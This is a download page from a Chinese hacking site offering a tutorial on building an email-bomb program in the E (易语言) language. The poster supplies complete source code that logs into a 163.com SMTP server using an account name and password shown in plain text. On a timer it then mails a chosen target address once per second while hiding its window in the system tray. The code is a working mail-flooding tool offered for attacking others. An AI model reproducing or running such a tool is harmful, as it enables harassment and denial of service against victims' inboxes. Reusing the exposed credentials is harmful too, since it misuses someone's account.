欢迎来到 黑吧安全网聚焦网络安全前沿资讯,精华内容,交流技术心得!

易语言制作E-mail攻击程序教程

  • 软件大小:4.69 MB
  • 软件语言:简体中文
  • 软件类型:综合教程
  • 软件授权:免费教程
  • 更新时间:2007-05-19
  • 标签:
  • 开 发 商:http://www.myhack58.com
  • 应用平台:WinXP, Win7, Win8, WinAll
软件评分
网友评分:3

同类人气软件

立即下载

易语言制作E-mail攻击程序教程软件介绍

黑客动画吧 http://www.hack58.com

致力于中国最专业的黑客安全站点

黑客动画吧,有你更精彩

-------------------------------------------------------------------------------------------大家好~我是 黑暗契约 QQ:262819316 

这是第一次做教程的如果做得不好还希望大家原谅~以后会做得更好的


我还没有黑吧论坛的帐号~做这个教程希望黑吧能给我个论坛的邀请码~~在这里先谢了哦~


这次教程的内容是做一个简单的程序攻击指定的E-mail


为了节约大家的时间教程中所有到的代码我就先写好了到时候再复制进去就可以了

用到的控件:

2个编辑框“用来输入要攻击的E-mail地址的”

2个组合框“用来排版的”


2个按钮“主要是确定攻击和取消攻击的”

1个时钟

还有就是建一个菜单栏  按ctrl+E打才菜单编辑器
 

布局大家就靠自己的想象力做得漂亮点吧``我的水平有限就简简单单的做了

(代码我会一起打包的了)


好了废话少说了``大家看操作哦 ~~先打开E


好了布局做好了~~~现在我们开始输入代码吧``我已经写好了`直接复制进去就好了~


.版本 2
.支持库 internet

.程序集 窗口程序集1

.子程序 __启动窗口_创建完毕

连接发信服务器 (“smtp.163.com”, , “262819316”, “880717”, )  ' 这里我就拿163的做了
置托盘图标 (#图标, “点击打开菜单”)  ' 这里要先查入一个图标文件ICO格式的

.子程序 _按钮1_被单击

时钟1.时钟周期 = 1000  ' 这里把时钟1的时钟周期改为要1000就是1秒给指的E-mail发一封信 大家也可以随便添
发送邮件 (“这里大家可以随便添”, 编辑框2.内容, “262819316@qq.com”, , , “262819316@qq.com”, )
按钮1.禁止 = 真
_启动窗口.可视 = 假  ' 这里隐藏了启动窗口  按钮1的代码也就这里几句了 现在我们写按钮2的也就是停止按钮的

.子程序 _按钮2_被单击

时钟1.时钟周期 = 0  ' 这里把这里把时钟1的时钟周期改为0也就是停止发送信息的
按钮1.禁止 = 假  ' 刚 刚按钮1被禁止了现在把他恢复的 按钮2的代码也写完了 现在我们开始菜单里面的代码 返回启动窗口

现在我们来写程序按钮的代码

子程序 _打开窗口_被选择

_启动窗口.可视 = 真


.子程序 _关闭_被选择

销毁 ()
' 这里写完了``我我们打开试下

右下角有图标了吧``呵呵``

现在我们来设置启动窗口的托盘事件


.子程序 __启动窗口_托盘事件
.参数 操作类型, 整数型

弹出菜单 (程序, , )


教程就做了这里了哦`~~~


谢谢大家的观看~~

8888888888888888888888888

  • 热门下载